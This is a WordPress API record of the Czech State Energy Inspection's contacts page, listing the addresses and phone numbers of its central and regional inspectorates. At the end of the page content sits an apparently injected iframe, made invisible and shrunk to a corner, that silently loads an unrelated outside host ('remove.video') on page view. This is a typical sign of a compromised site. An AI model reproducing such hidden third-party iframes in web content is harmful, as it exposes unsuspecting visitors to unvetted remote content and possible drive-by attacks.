{"id":3575,"date":"2017-03-02T09:32:05","date_gmt":"2017-03-02T09:32:05","guid":{"rendered":"https:\/\/sei.gov.cz\/?page_id=3575"},"modified":"2026-04-16T12:23:26","modified_gmt":"2026-04-16T11:23:26","slug":"telefoni-seznam","status":"publish","type":"page","link":"https:\/\/sei.gov.cz\/?page_id=3575","title":{"rendered":"Kontakty"},"content":{"rendered":"<p style=\"text-align: left;\">Pro b\u011b\u017en\u00e9 dotazy, nebo pod\u00e1n\u00ed podle z\u00e1kona vyu\u017eijte pros\u00edm tento <a href=\"https:\/\/sei.gov.cz\/?page_id=1127\">odkaz <\/a>, kde tak\u00e9 najdete informace jak ve Va\u0161em p\u0159\u00edpad\u011b postupovat, a\u0165 se V\u00e1\u0161 dotaz co nejd\u0159\u00edve dostane do spr\u00e1vn\u00fdch rukou.<\/p>\n<p><big><big>ID datov\u00e9 schr\u00e1nky: hq2aev4<br \/>\nI\u010cO: 61387584<\/big><\/big><\/p>\n<hr \/>\n<p><b id=\"ustredi\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fast\u0159edn\u00ed inspektor\u00e1t<\/b><br \/>\nGorazdova 24, 120 00 Praha 2<\/p>\n<p>Sekretari\u00e1t: 224 855 340, 725 985 761<\/p>\n<hr \/>\n<p><b id=\"praha\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro hl. m\u011bsto Prahu a St\u0159edo\u010desk\u00fd kraj<\/b><br \/>\nGorazdova 24, 120 00 Praha 2<\/p>\n<p>Sekretari\u00e1t: 224 855 129, 731 135 982<\/p>\n<hr \/>\n<p><b id=\"budejky\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro Jiho\u010desk\u00fd kraj a Kraj Vyso\u010dina<\/b><br \/>\nLipensk\u00e1 17, 370 01 \u010cesk\u00e9 Bud\u011bjovice<\/p>\n<p>Sekretari\u00e1t: 604 210 868<\/p>\n<hr \/>\n<p><b id=\"plzen\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro Plze\u0148sk\u00fd a Karlovarsk\u00fd kraj<\/b><br \/>\nRejskova 3, 326 00 Plze\u0148<\/p>\n<p>Sekretari\u00e1t: 377 201 221, 605 292 834<\/p>\n<hr \/>\n<p><b id=\"liberec\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro Libereck\u00fd a \u00dasteck\u00fd kraj<\/b><br \/>\nn\u00e1m. Dr. E. Bene\u0161e 26, 460 01 Liberec 1 \u2013 Star\u00e9 M\u011bsto<\/p>\n<p>Sekretari\u00e1t: 731 135 983, 731 439 661<\/p>\n<hr \/>\n<p><b id=\"usti\">St\u00e1tn\u00ed energetick\u00e1 inspekce, deta\u0161ovan\u00e9 pracovi\u0161t\u011b \u00fazemn\u00edho inspektor\u00e1tu pro Libereck\u00fd a \u00dasteck\u00fd kraj<\/b><br \/>\nM\u00edrov\u00e9 n\u00e1m\u011bst\u00ed 3129\/36, 400 01 \u00dast\u00ed nad Labem<\/p>\n<p>Sekretari\u00e1t: 731 135 983, 731 439 661<\/p>\n<hr \/>\n<p><b id=\"hradec\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro Kr\u00e1lov\u00e9hradeck\u00fd a Pardubick\u00fd kraj<\/b><br \/>\nUlrichovo n\u00e1m\u011bst\u00ed 810, 500 02 Hradec Kr\u00e1lov\u00e9<\/p>\n<p>Sekretari\u00e1t: 495 705 113, 604 210 867<\/p>\n<hr \/>\n<p><b id=\"brno\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro Jihomoravsk\u00fd a Zl\u00ednsk\u00fd kraj<\/b><br \/>\nKotl\u00e1\u0159sk\u00e1 931\/53, 602 00 Brno<\/p>\n<p>Sekretari\u00e1t: 543 420 010, 731 135 989<\/p>\n<hr \/>\n<p><b id=\"zlin\">St\u00e1tn\u00ed energetick\u00e1 inspekce, deta\u0161ovan\u00e9 pracovi\u0161t\u011b \u00fazemn\u00edho inspektor\u00e1tu pro Jihomoravsk\u00fd a Zl\u00ednsk\u00fd kraj <\/b><br \/>\nt\u0159. T. Bati 853, 760 01 Zl\u00edn<\/p>\n<p>Sekretari\u00e1t: 577 005 641, 731 135 985<\/p>\n<hr \/>\n<p><b id=\"ostrava\">St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fazemn\u00ed inspektor\u00e1t pro Moravskoslezsk\u00fd a Olomouck\u00fd kraj<\/b><br \/>\nProvozn\u00ed 1, 722 00 Ostrava \u2013 T\u0159ebovice<\/p>\n<p>Sekretari\u00e1t: 731 135 986<\/p>\n<hr \/>\n<p><b id=\"olomouc\">St\u00e1tn\u00ed energetick\u00e1 inspekce, deta\u0161ovan\u00e9 pracovi\u0161t\u011b \u00fazemn\u00edho inspektor\u00e1tu pro Moravskoslezsk\u00fd a Olomouck\u00fd kraj<\/b><br \/>\nt\u0159. M\u00edru 273\/99, 779 00 Olomouc<\/p>\n<p>Sekretari\u00e1t: 585 711 711, 605 202 653, 737 203 372<iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pro b\u011b\u017en\u00e9 dotazy, nebo pod\u00e1n\u00ed podle z\u00e1kona vyu\u017eijte pros\u00edm tento odkaz , kde tak\u00e9 najdete informace jak ve Va\u0161em p\u0159\u00edpad\u011b postupovat, a\u0165 se V\u00e1\u0161 dotaz co nejd\u0159\u00edve dostane do spr\u00e1vn\u00fdch rukou. ID datov\u00e9 schr\u00e1nky: hq2aev4 I\u010cO: 61387584 St\u00e1tn\u00ed energetick\u00e1 inspekce, \u00fast\u0159edn\u00ed inspektor\u00e1t Gorazdova 24, 120 00 Praha 2 Sekretari\u00e1t: 224 855 340, 725 985 761 &hellip; <\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3575","page","type-page","status-publish","hentry","latest_post"],"_links":{"self":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages\/3575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3575"}],"version-history":[{"count":64,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages\/3575\/revisions"}],"predecessor-version":[{"id":10022,"href":"https:\/\/sei.gov.cz\/index.php?rest_route=\/wp\/v2\/pages\/3575\/revisions\/10022"}],"wp:attachment":[{"href":"https:\/\/sei.gov.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}